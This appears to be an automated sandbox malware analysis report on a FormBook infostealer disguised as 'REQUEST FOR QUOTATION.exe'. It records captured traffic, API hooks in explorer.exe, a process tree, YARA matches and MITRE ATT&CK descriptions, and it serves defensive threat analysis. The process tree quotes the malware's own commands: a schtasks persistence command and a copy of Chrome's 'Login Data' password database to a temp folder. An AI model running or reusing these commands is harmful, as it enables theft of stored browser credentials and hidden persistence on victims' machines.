6f 47 35 52 36 5f 44 35 52 54 28 45 74 62 65 6f 5a 41 6f 77 42 4b 68 35 58 78 44 43 78 57 77 6d 4b 33 50 56 46 45 4d 47 50 6c 42 71 4b 54 38 78 68 7a 70 45 6a 69 32 4d 54 31 77 6d 61 4a 74 6b 56 53 62 61 6b 6b 47 49 57 31 63 65 31 49 71 56 78 50 6b 50 43 71 5a 41 30 68 6d 37 46 41 56 67 72 6f 61 76 62 73 35 71 73 56 72 43 4c 4a 71 47 74 75 4b 65 5a 45 71 77 73 59 50 77 59 59 52 7a 35 49 76 56 55 41 6f 63 70 52 6a 56 49 49 37 2d 63 31 28 4d 66 48 54 4e 62 63 74 5a 5a 70 62 59 51 59 43 35 78 43 4c 58 57 34 6e 5f 34 79 6c 36 67 67 39 4d 50 5f 4a 4d 73 57 41 54 37 75 5a 6f 6a 59 55 64 6b 36 74 78 39 47 7a 6e 7e 31 68 38 7a 57 45 38 61 63 49 4c 73 73 46 6a 33 69 4a 79 35 69 34 59 52 7a 41 36 72 37 55 75 31 38 49 56 62 70 75 43 56 65 47 39 70 6c 63 36 45 52 61 79 79 57 63 63 4d 57 39 68 69 38 55 67 36 62 28 75 4c 54 6a 50 36 51 77 78 58 77 6d 34 45 61 54 70 76 70 44 72 34 49 32 31 33 6d 36 36 33 64 69 74 56 31 48 32 6e 64 61 68 35 5f 61 58 58 6a 46 4d 52 47 34 37 36 64 50 6e 6e 6c 4e 58 6d 68 79 4d 53 52 4f 48 65 51 39 6c 6d 6f 75 5f 74 4a 38 6e 55 77 4e 4e 4b 2d 76 61 64 59 73 4f 52 4f 43 63 30 71 53 38 58 39 57 65 36 33 7e 69 36 52 38 65 28 36 59 55 62 6e 69 49 31 37 4a 44 66 51 28 5f 4c 75 5a 71 56 36 38 76 65 34 56 37 70 33 74 58 35 6f 6e 4f 62 76 37 4d 59 6f 4c 34 37 4a 65 77 6a 33 31 42 55 4b 44 52 51 46 38 46 36 7a 71 57 42 63 4f 57 47 57 45 6d 30 72 6e 2d 69 36 33 74 71 73 6d 67 59 64 5a 49 37 79 43 73 4c 44 39 77 50 31 52 5a 4c 62 38 69 54 42 42 6c 4a 6f 72 6b 47 6a 67 6a 67 34 53 42 45 4e 6d 55 64 75 34 50 58 36 63 6e 7a 37 72 52 59 61 33 77 4a 38 41 72 65 74 51 52 41 49 45 48 37 38 48 49 36 77 76 71 4d 75 4b 2d 4f 65 69 78 51 7a 54 47 54 70 48 2d 6a 70 6c 61 42 74 42 39 74 6b 54 58 33 58 42 64 35 7a 6e 48 46 64 4b 69 4a 51 41 66 66 72 74 50 56 72 49 4d 4d 32 38 56 76 34 34 6c 71 2d 63 4a 4f 65 62 32 59 45 4e 4a 62 4c 75 79 4d 56 4d 6e 65 35 6c 61 35 52 4a 73 64 41 43 68 49 6f 50 59 62 44 4c 37 65 6d 38 58 37 35 7a 5f 30 74 66 39 68 46 33 63 34 43 37 56 7e 61 76 71 41 42 7e 75 4d 41 28 79 4e 4b 6f 4b 4d 57 79 79 39 4f 78 77 41 38 71 59 31 45 46 65 48 47 44 71 39 5f 69 6a 59 5a 34 45 56 58 5a 68 33 79 6c 61 79 51 43 74 57 46 70 4c 79 36 51 62 4f 4c 68 6a 36 46 55 58 4d 52 65 4f 4e 50 50 38 71 6d 45 78 57 63 39 6e 31 77 4e 79 47 6d 6a 48 48 48 64 52 32 50 56 32 65 59 51 4a 59 6f 71 61 64 36 5a 43 74 33 49 54 34 69 6b 62 78 43 72 4d 62 35 66 74 34 6e 78 63 44 55 57 41 35 6f 50 63 58 45 42 77 4e 56 33 55 43 75 52 5a 36 7a 70 62 53 61 76 46 44 68 51 41 53 6e 6f 64 4f 64 6a 6b 39 62 50 43 54 65 41 47 47 57 74 44 6b 58 75 71 4d 79 50 50 4a 7a 38 48 53 47 62 52 6d 61 58 49 36 73 75 75 6e 30 75 78 6c 54 42 62 4b 4d 71 34 31 36 52 64 63 69 42 52 55 49 77 37 4b 37 62 51 79 6b 57 63 79 56 57 72 38 42 65 7a 77 74 67 58 41 52 38 6e 73 66 46 34 57 58 42 45 73 48 6e 6f 6d 42 5a 68 78 5f 78 41 54 75 7e 68 6e 4e 6d 44 6d 71 69 6b 52 33 56 36 6e 51 41 34 63 Data Ascii: GlW8J=Si5QU3ntD9PKRMMsNGQDk_ZS5KYZvBjvzeJyeiNwSsF8~tKcl-~sF-GvXMrZsm8UgSQNvv0LQhvXUD6q6zREc1bvvE(X1FiTpd2Odh~thakx3umlpHyeoWIaan2E1bdTQBTaK1jUFKOM~yuJBxQUTqIKdYgX93a2(J3g3ZFWTLvkhfQRQNZ2E5DOc5OY35dcpNa5m5sszert(_r7R1CfL7azfL84fbPtmzmZazuyoThZ9QgduK9NvL8D8N2lIaw5I0n56cxRZyIdW50duPwcEWlfbk3h4ga-WtT3Ky3lbR4YMmpXvp44RfnKxmS_OhoJm3RPnqQ9Dff2vfUTMvXJ9_rOm03p~iRSq2LNHjx-9VLc9YoUnCywutOznG8KWUwyAQbgKEtHoG5R6_D5RT(EtbeoZAowBKh5XxDCxWwmK3PVFEMGPlBqKT8xhzpEji2MT1wmaJtkVSbakkGIW1ce1IqVxPkPCqZA0hm7FAVgroavbs5qsVrCLJqGtuKeZEqwsYPwYYRz5IvVUAocpRjVII7-c1(MfHTNbctZZpbYQYC5xCLXW4n_4yl6gg9MP_JMsWAT7uZojYUdk6tx9Gzn~1h8zWE8acILssFj3iJy5i4YRzA6r7Uu18IVbpuCVeG9plc6ERayyWccMW9hi8Ug6b(uLTjP6QwxXwm4EaTpvpDr4I213m663ditV1H2ndah5_aXXjFMRG476dPnnlNXmhyMSROHeQ9lmou_tJ8nUwNNK-vadYsOROCc0qS8X9We63~i6R8e(6YUbniI17JDfQ(_LuZqV68ve4V7p3tX5onObv7MYoL47Jewj31BUKDRQF8F6zqWBcOWGWEm0rn-i63tqsmgYdZI7yCsLD9wP1RZLb8iTBBlJorkGjgjg4SBENmUdu4PX6cnz7rRYa3wJ8AretQRAIEH78HI6wvqMuK-OeixQzTGTpH-jplaBtB9tkTX3XBd5znHFdKiJQAffrtPVrIMM28Vv44lq-cJOeb2YENJbLuyMVMne5la5RJsdAChIoPYbDL7em8X75z_0tf9hF3c4C7V~avqAB~uMA(yNKoKMWyy9OxwA8qY1EFeHGDq9_ijYZ4EVXZh3ylayQCtWFpLy6QbOLhj6FUXMReONPP8qmExWc9n1wNyGmjHHHdR2PV2eYQJYoqad6ZCt3IT4ikbxCrMb5ft4nxcDUWA5oPcXEBwNV3UCuRZ6zpbSavFDhQASnodOdjk9bPCTeAGGWtDkXuqMyPPJz8HSGbRmaXI6suun0uxlTBbKMq416RdciBRUIw7K7bQykWcyVWr8BezwtgXAR8nsfF4WXBEsHnomBZhx_xATu~hnNmDmqikR3V6nQA4ceuUr76PWzq-mzZT30Il5JiC8gVbX2DCr22uhep6K3diHQPHIyEJ5dm5zpHAWz4F4QqxU0KF3TNdKluMX0ha2WJnCX~Y~ois~FDueKDU5JDHfkSD~9KyJmFshtSYKwOFkC897kkflwX4lXMjwqL5XnYvw0lVWxhpcKRTLaFe88NIXo~djLlkeyTjPru4Q5npL2SkYUXqcNZutKyaGUlL(Mn48l(JNHF1iLOzGf6FIOz6DDb9dj(EX1ufVVyZ(iZ5W_YoIgEv5uJR4f9Z~EEFsO37sBi2TWynHyluhPvonoHII0U-lQZEU7RB~luLORQU48eBmvik6ybvBhU-U2lq9E3AxsH7PlXf17ceGxyLMhlxYdTX4ycro2ptXNZpX_fuLcZzKBWRrV8J6GLSIn3UxrnBd4ol8_~OlynPybMM5mVPw6CdRMMKzW7K8AM3SlbhHkXYsZHEytUIN0YCyGZyD46ixUEac7eADzYlVXkVk0EmGhsuB-(RRA4MdULLRsgMnbX42geooNZJZIC3KP7jYNilZkoJFXzgdiTaRTkjzCZrm2mNY1X9lNlyhP4KYvPHp7WOcNY_HtC-J36pU9wwTEq7l6B5yD4yBV~5f5oyMCxF8gxqiKxi4BVI1kNt2sI_AniGpW5k70WVjXxNBz5yvEqNvggUh5irUGoIKLINHF4ctqnvbBXSjKFtc7dGuiWUT2dPPAuewSCXPh0y~Blc7ohZaGL4O9GyLLg2VLXUpGgTuQo2mPynUwM6ydJgzfYEX13iD57tmw3xvm1g4X8Zk6NcsmtF7Vp-LMczpyqGQ48bZ6lMqmXxfoaI~7DMz1bYKOlj53Ro(39C7m0FYaZAUw01FbNlre93mkuA4WyBM_8Ppz~f4RgmHWeiutEoFs5fC6KHzBWuVkSgLcBKvh8j3u8XaQ1-toH8cqyuUYmQtn1xzX4LF2xzY4H8e15sU-e5fG8xdY0FBYbY4bcVeREd3hbZuxDoHoXTGAaPlDbXsiWQA_jJTOFL3gDpIV53Fls2~VRmrtsYptVRITifk8LUlFsYEkqQN_uSTSMQFpqFwMEkwuCV1jIR0Pnzq-4qQvQGYzNUGLDLa91aIp91STSR84XT6lcp9ic-W7szg3GFbkv1CWcURn6A6GNPtavIVj9ZdDo3eUNhjYay7CMgogQeVWhTTQiE4eg-cQebaOR2voOXv7t9NpqKDn10KL7rCtIQdpwZPBuxygIsM5hSh1P-KuWsxqxWG8Mv7Vf6UaM-g-XnC-e2~vR9yeana_hvuMV1jLgRXDXwYFWtQ_N_5NzYFa~0OONyW_0d3He1jQw4HGIiHW6HcpWoumz-q61Gd2MM9_t6d4Es87bfemCKSMZgeb1NfIbSJ3m62ybrVzz6thlE8GQNECzwBLQkItYsjLPnzmvo9H9k~1V4bWfp(RtnDh9-PwmyV058tlgR8xWKnfqfS323yw7vZPJ4UyhACSoeF0Q3QkB_OVRdApX8mXKoHYcgFxArHKpgTf1InUYjjs3n5bhPFHLMFKIcqvqDL9Uq9I0PGrtoA1B3Fi8Kdt7-(tVFx-w6ProKMqvKTS41ullLYO7eU8JuJ9ROMiw1HRB_5RyYraZXxXg9eRHtocWAaPqTxX(v8EWSyfrjNkKM2TRZ3GqqhuUZ(_tRUfnfB9dClekGmqh9WgpJSdK_RvuZlj8DgJnYd4Hi47NkBHKSkmEPYpb2J6SDXLj2NADuHny9hqOoIlx5FaAulzopwHNges9MCa4cdYDiQYU9ISHVHXuXL2P3uZHVnCslNOBwZOWg6Md6zgo0(mMczXHp449n~4CWPfw7xhO7VM~oQ1KtypNHvpxB3S1zprIrHSfGkc441mAaCouw3231hg5rdhq6rJBUcRH_3GzelHAqRHlxQWIv00FyY3qDoFzJip~x0R6cOzkjso1sYk7SlEOsBL9bCETJf9FVPadm~ndZLCrgeYV6gs(ImMsgDVVE7GcJ268Ca3rOFYqPsRLBvfdgy-IeFocgZHJN7d9fpSzKZv4Bxw8rHK3QJAyaueT2D16V3z9yykA7KJGpz9Rnp21g2UhBEYRtzo0DHkq86_AwMV0sXxjx(oBeepoKROqKjoJuQ5rP(yjiLf7ZQTpNDJSHZTVGIlTcSDU9aG0p8dLKPGpPsNPUjcEq5vBvqE7j2Q6ARBz8RUA05HwYBAYv3PFKPabYt6idEJQuqUjJMRc5OG(dNEK9(ZFrwiSp1dUNfgpCPDvJDsGEJEOFUthD(T6OCV0BM8303fl7cuL3KX6vc2sRUXfi0kTK4mv3Kl5_OeOH2Eou7MRMxHBUN7hRSAb5FBGx~DpOhkWIZ-ytu62-IQ0eG4yHqtjG6lnlR7CS~dlKfnAoK8Qg6UzvRwQGMYaIpMTm0p(1f01-GvKM1JMX6XTnO9HKVSP0EqunV35OZlytg7lvLqlA(q4JjZQ-i0hPBlnkDgKRTLTXdTy77b1SlZ0g6Haputzt44lgsTX3pEnwAwQqXvOFEGMXvjaNLws3vM6wzMOA3xQQQip0pVVWOVkA~_MU5GEUnpZMZLHcF9beL_1h9Nfx21n3uUrdMTrAv58U2cIUAml3hs~bbRMr3fgbbG(JckhgsRhLvHNWOWpLkG7KIsrgr7BdOcrk2vhJjAd1ctSvXkUTRR1d8JoXcRFSAOPFEJz8K2FbxXHWW0Y1qS8eDZLxuyVYDVg6MCND5RPSbiYJjmfazvKu9a36

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE3
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE3
GetMessageW	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE3
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE3

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: REQUEST FOR QUOTATION.exe PID: 6992 Parent PID: 5880

General

Start time:	10:17:07
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe'
Imagebase:	0xe40000
File size:	1282048 bytes
MD5 hash:	1D229F76672A250BD0C2FF84417D63E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: schtasks.exe PID: 7132 Parent PID: 6992

General

Start time:	10:17:10
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
Imagebase:	0xd30000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 7152 Parent PID: 7132

General

Start time:	10:17:11
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: REQUEST FOR QUOTATION.exe PID: 3848 Parent PID: 6992

General

Start time:	10:17:11
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Imagebase:	0x6f0000
File size:	1282048 bytes
MD5 hash:	1D229F76672A250BD0C2FF84417D63E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: explorer.exe PID: 3424 Parent PID: 3848

General

Start time:	10:17:14
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: systray.exe PID: 6284 Parent PID: 3424

General

Start time:	10:17:29
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0xdf0000
File size:	9728 bytes
MD5 hash:	1373D481BE4C8A6E5F5030D2FB0A0C68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 240 Parent PID: 6284

General

Start time:	10:17:34
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 4824 Parent PID: 240

General

Start time:	10:17:35
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report REQUEST FOR QUOTATION.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

